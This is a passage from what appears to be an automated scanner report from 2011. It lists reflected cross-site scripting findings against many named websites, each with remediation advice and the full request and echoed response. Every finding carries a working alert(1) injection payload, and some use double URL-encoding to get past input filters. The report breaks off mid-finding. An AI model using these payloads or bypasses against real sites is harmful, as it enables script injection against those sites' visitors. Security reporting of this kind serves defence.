Set-Cookie: ASPSESSIONIDCACTACRQ=OGGIAFJDLHFDAGACDGJDLKMD; path=/
Cache-control: private


<!-- ******************************************
       MAY NOT BE REMOVED

CandyPress Shopping Cart Version 3.3
http://www.candypress.com
Copyright 2005 by Shopping Tree, Inc.

       MAY NOT BE REM
...[SNIP]...
<form method="POST" action="http://www.aquascapeonline.com/custom404.asp?404;http://www.aquascapeonline.com:80/favicon.ico?4f2c5"><script>alert(1)</script>c2b8edb6758=1" name="LangChange">
...[SNIP]...

6.44. http://www.ashop.com.au/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ashop.com.au
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9fc6"-alert(1)-"cc0bd250eb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico?e9fc6"-alert(1)-"cc0bd250eb4=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ashop.com.au
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:32 GMT
Server: Microsoft-IIS/6.0
S: 1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: SD=32765249823E4A8A9C331D4F26B28A5C; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 933


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>

</title><script type="text/javascript">var TimeZone = 10;var Current_page_URL = "http://www.ashop.com.au/favicon.ico?e9fc6"-alert(1)-"cc0bd250eb4=1"; var mySiteID = 336; var hkey=""; var MachineCode = "QC8T6BQ7"</script>
...[SNIP]...

6.45. http://www.bigtitcreampie.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bigtitcreampie.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1534a"-alert(1)-"9a18ac6c6e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico1534a"-alert(1)-"9a18ac6c6e1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bigtitcreampie.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:31:39 GMT
Server: Apache
Set-Cookie: nomobile=0; path=/; domain=.bigtitcreampie.com; expires=Wed, 04-May-2011 07:31:39 GMT
Vary: Host,Accept-Encoding,User-Agent,Accept-Language
X-Powered-By: PHP/5.2.11-pl1-gentoo
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: psinfo=bbonet%7Cbigtitcreampie%7C1%7Cpps%7C%7C%7C%7C%7C%7C%7C%7C%7Cus; expires=Thu, 02-Jun-2011 11:31:39 GMT; path=/; domain=.bigtitcreampie.com
Set-Cookie: psextra=173.193.214.243%7COK%3B%7C; expires=Thu, 02-Jun-2011 11:31:39 GMT; path=/; domain=.bigtitcreampie.com
Cache-Control: max-age=900
Expires: Tue, 03 May 2011 11:46:39 GMT
Content-Type: text/html
Content-Length: 8703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
   <title></title>    <meta http-equiv="Content-Language" content="e
...[SNIP]...

var pageTracker = _gat._getTracker("");
pageTracker._setCampNameKey('id');
pageTracker._setVar("bbonet");
pageTracker._trackPageview("www.bigtitcreampie.com/favicon.ico1534a"-alert(1)-"9a18ac6c6e1");
}
catch(err) {}
</script>
...[SNIP]...

6.46. http://www.bigtitcreampie.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bigtitcreampie.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5933"-alert(1)-"62cc159c67b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico?e5933"-alert(1)-"62cc159c67b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bigtitcreampie.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:31:35 GMT
Server: Apache
Set-Cookie: nomobile=0; path=/; domain=.bigtitcreampie.com; expires=Wed, 04-May-2011 07:31:35 GMT
Vary: Host,Accept-Encoding,User-Agent,Accept-Language
X-Powered-By: PHP/5.2.11-pl1-gentoo
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: psinfo=bbonet%7Cbigtitcreampie%7C1%7Cpps%7C%7C%7C%7C%7C%7C%7C%7C%7Cus; expires=Thu, 02-Jun-2011 11:31:35 GMT; path=/; domain=.bigtitcreampie.com
Set-Cookie: psextra=173.193.214.243%7COK%3B%7C; expires=Thu, 02-Jun-2011 11:31:35 GMT; path=/; domain=.bigtitcreampie.com
Cache-Control: max-age=900
Expires: Tue, 03 May 2011 11:46:35 GMT
Content-Type: text/html
Content-Length: 8706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
   <title></title>    <meta http-equiv="Content-Language" content="e
...[SNIP]...
var pageTracker = _gat._getTracker("");
pageTracker._setCampNameKey('id');
pageTracker._setVar("bbonet");
pageTracker._trackPageview("www.bigtitcreampie.com/favicon.ico?e5933"-alert(1)-"62cc159c67b=1");
}
catch(err) {}
</script>
...[SNIP]...

6.47. http://www.bvonstyle.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bvonstyle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c33c"><x%20style%3dx%3aexpression(alert(1))>b9601e04b3b was submitted in the REST URL parameter 1. This input was echoed as 7c33c"><x style=x:expression(alert(1))>b9601e04b3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.ico7c33c"><x%20style%3dx%3aexpression(alert(1))>b9601e04b3b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bvonstyle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Tue, 03-May-2011 12:05:45 GMT; path=/
Content-Type: text/html
Content-Length: 10952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>BV on Style</title>
...[SNIP]...
<link rel="canonical" href="http://www.bvonstyle.com/favicon.ico7c33c"><x style=x:expression(alert(1))>b9601e04b3b/" />
...[SNIP]...

6.48. http://www.cashstore.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cashstore.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 221b9"><img%20src%3da%20onerror%3dalert(1)>9c5e9d404d0 was submitted in the REST URL parameter 1. This input was echoed as 221b9"><img src=a onerror=alert(1)>9c5e9d404d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico221b9"><img%20src%3da%20onerror%3dalert(1)>9c5e9d404d0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cashstore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:19:31 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESSbf3783e9f35cdd20ff6d0dfc9f8a8166=mjp0b56fnrvqibpd3n3tbbgg00; expires=Thu, 26-May-2011 14:52:51 GMT; path=/; domain=.cashstore.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 11:19:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 7750
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<body class="not-front not-logged-in page-faviconico221b9img-srca-onerroralert19c5e9d404d0 no-sidebars favicon.ico221b9"><img src=a onerror=alert(1)>9c5e9d404d0 favicon.ico221b9">
...[SNIP]...

6.49. http://www.cerritos.edu/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cerritos.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 367ec%253cscript%253ealert%25281%2529%253c%252fscript%253ea2a333b627d was submitted in the REST URL parameter 1. This input was echoed as 367ec<script>alert(1)</script>a2a333b627d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico367ec%253cscript%253ealert%25281%2529%253c%252fscript%253ea2a333b627d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cerritos.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:28 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Mon, 02 May 2011 11:42:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us">
<head><titl
...[SNIP]...
<p />(Referring Page: favicon.ico367ec<script>alert(1)</script>a2a333b627d)
<p />
...[SNIP]...

6.50. http://www.churchleaderinsights.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.churchleaderinsights.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b9b8<script>alert(1)</script>fb5f52160f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico2b9b8<script>alert(1)</script>fb5f52160f9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.churchleaderinsights.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:34 GMT
Server: Apache
Set-Cookie: exp_last_visit=989059834; expires=Wed, 02-May-2012 10:50:34 GMT; path=/
Set-Cookie: exp_last_activity=1304419834; expires=Wed, 02-May-2012 10:50:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A19%3A%22oops-page-not-found%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:50:35 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Oops...
...[SNIP]...
<strong>/favicon.ico2b9b8<script>alert(1)</script>fb5f52160f9</strong>
...[SNIP]...

6.51. http://www.click-now.net/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.click-now.net
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c67c7"><a>a859c78e1d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico?c67c7"><a>a859c78e1d3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.click-now.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:49:18 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: _downloadBarCom=3f8b63343a99c3443f4758b05ac2e929; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _downloadBarCom=9661ebbcbb2536ac2e3b1d997866c9db; path=/
Content-Type: text/html
Content-Length: 10417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a id="tellafriend" href="http://www.downloadbar.com/tellafriend.php?page=www.click-now.net/favicon.ico?c67c7"><a>a859c78e1d3=1&keepThis=true&TB_iframe=true&height=280&width=550" class="thickbox pinklink">
...[SNIP]...

6.52. http://www.coinmerc.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.coinmerc.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b49f"><script>alert(1)</script>1e753f7fc5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?5b49f"><script>alert(1)</script>1e753f7fc5c=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coinmerc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 68308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<title>
...[SNIP]...
<a href="http://www.coinmerc.com/ko/index/5b49f"><script>alert(1)</script>1e753f7fc5c/1/5b49f">
...[SNIP]...

6.53. http://www.diethealthclub.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diethealthclub.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 190f9"><script>alert(1)</script>47bfedf4e79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico190f9"><script>alert(1)</script>47bfedf4e79 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diethealthclub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:29:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=2lpi2j10dudnotdiacb4u7tnd0; expires=Wed, 02 May 2012 10:29:02 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 16351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Page Not Found</
...[SNIP]...
<a title="del.icio.us" href="http://del.icio.us/post?url=http://www.diethealthclub.com/favicon.ico190f9"><script>alert(1)</script>47bfedf4e79" target="_blank" class="delicious" rel="nofollow">
...[SNIP]...

6.54. http://www.fluke.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fluke.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4def%2522%253balert%25281%2529%252f%252f9b13c6b24ed was submitted in the REST URL parameter 1. This input was echoed as d4def";alert(1)//9b13c6b24ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.icod4def%2522%253balert%25281%2529%252f%252f9b13c6b24ed HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fluke.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Set-Cookie: .ASPXANONYMOUS=jOvnhRBAzAEkAAAAMDYzMjJmOGItNTdjYy00ZjE0LWFiZTUtZGMxZjhhODA5MTcwoX4U3QnRpeq2OGYGSX9LdGSmrvA1; expires=Mon, 11-Jul-2011 21:21:39 GMT; path=/; HttpOnly
Content-Length: 69788
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:41:39 GMT
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="_ctl0_Head1"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta
...[SNIP]...
<!--
s.pageName="favicon.icod4def";alert(1)//9b13c6b24ed 404";
s.pageType='errorPage';var OmniUserGUID;
function readCookie(c_name) {
var c_start,c_end;
if (document.cookie.length>
...[SNIP]...

6.55. http://www.fluke.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fluke.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89480"%3balert(1)//74e63558e96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89480";alert(1)//74e63558e96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico?89480"%3balert(1)//74e63558e96=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fluke.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Set-Cookie: .ASPXANONYMOUS=tHxqbBBAzAEkAAAAYzk2ZWE3MGYtYTdjZS00ZTcxLWFiYjAtYTRhYjBjYzY0MDkxzQN7HNG7GWuJSfwBnGTGwMu95y41; expires=Mon, 11-Jul-2011 21:20:56 GMT; path=/; HttpOnly
Content-Length: 69809
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:40:57 GMT
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="_ctl0_Head1"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta
...[SNIP]...
<!--
s.pageName="favicon.ico?89480";alert(1)//74e63558e96=1 404";
s.pageType='errorPage';var OmniUserGUID;
function readCookie(c_name) {
var c_start,c_end;
if (document.cookie.length>
...[SNIP]...

6.56. http://www.forconstructionpros.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forconstructionpros.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38d7f<script>alert(1)</script>465149a15ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico38d7f<script>alert(1)</script>465149a15ad HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.forconstructionpros.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:19:49 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 599

<head>
<title>ERROR 404</title>
</head>
<center>
<h1>www.forconstructionpros.com</h1>
<h1><strong>ERROR 404</strong></h1>
</center>
<strong>The URL that you requested, /favicon.ico38d7f<script>alert(1)</script>465149a15ad
could not be found. Perhaps you either mistyped the
URL or we have a broken link.</strong>
...[SNIP]...

6.57. http://www.greatnow.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greatnow.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 19bcc--><script>alert(1)</script>b85e5b127a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico19bcc--><script>alert(1)</script>b85e5b127a8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatnow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:24:16 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Cache: MISS from squid2.0catch.com
Connection: close

<!--
DOCUMENT_ROOT = /home/catch/htdocs
GATEWAY_INTERFACE = CGI/1.1
HTTP_ACCEPT = */*
HTTP_CACHE_CONTROL = max-age=259200
HTTP_CONNECTION = keep-alive
HTTP_HOST = greatnow.com
HTTP_USER_AGENT = curl/7
...[SNIP]...
243
MOD_PERL = mod_perl/2.0.4
MOD_PERL_API_VERSION = 2
PATH = /usr/local/bin:/usr/bin:/bin
QUERY_STRING =
REMOTE_ADDR = 192.41.60.75
REMOTE_PORT = 18090
REQUEST_METHOD = GET
REQUEST_URI = /favicon.ico19bcc--><script>alert(1)</script>b85e5b127a8
SCRIPT_FILENAME = /home/catch/cgi-bin/parse.pl
SCRIPT_NAME = /favicon.ico19bcc-->
...[SNIP]...

6.58. http://www.greatnow.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greatnow.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9ddd5--><script>alert(1)</script>7edd33653a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico?9ddd5--><script>alert(1)</script>7edd33653a3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatnow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:24:10 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Cache: MISS from squid2.0catch.com
Connection: close

<!--
DOCUMENT_ROOT = /home/catch/htdocs
GATEWAY_INTERFACE = CGI/1.1
HTTP_ACCEPT = */*
HTTP_CACHE_CONTROL = max-age=259200
HTTP_CONNECTION = keep-alive
HTTP_HOST = greatnow.com
HTTP_USER_AGENT = curl/7
...[SNIP]...
.3
HTTP_VIA = 1.1 squid2.0catch.com:80 (squid/2.5.STABLE14)
HTTP_X_FORWARDED_FOR = 173.193.214.243
MOD_PERL = mod_perl/2.0.4
MOD_PERL_API_VERSION = 2
PATH = /usr/local/bin:/usr/bin:/bin
QUERY_STRING = 9ddd5--><script>alert(1)</script>7edd33653a3=1
REMOTE_ADDR = 192.41.60.75
REMOTE_PORT = 12058
REQUEST_METHOD = GET
REQUEST_URI = /favicon.ico?9ddd5-->
...[SNIP]...

6.59. http://www.healthcarejobsite.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthcarejobsite.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload ffe89%20style%3dx%3aexpression(alert(1))%200209854a144 was submitted in the REST URL parameter 1. This input was echoed as ffe89 style=x:expression(alert(1)) 0209854a144 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.icoffe89%20style%3dx%3aexpression(alert(1))%200209854a144 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthcarejobsite.com
Accept: */*
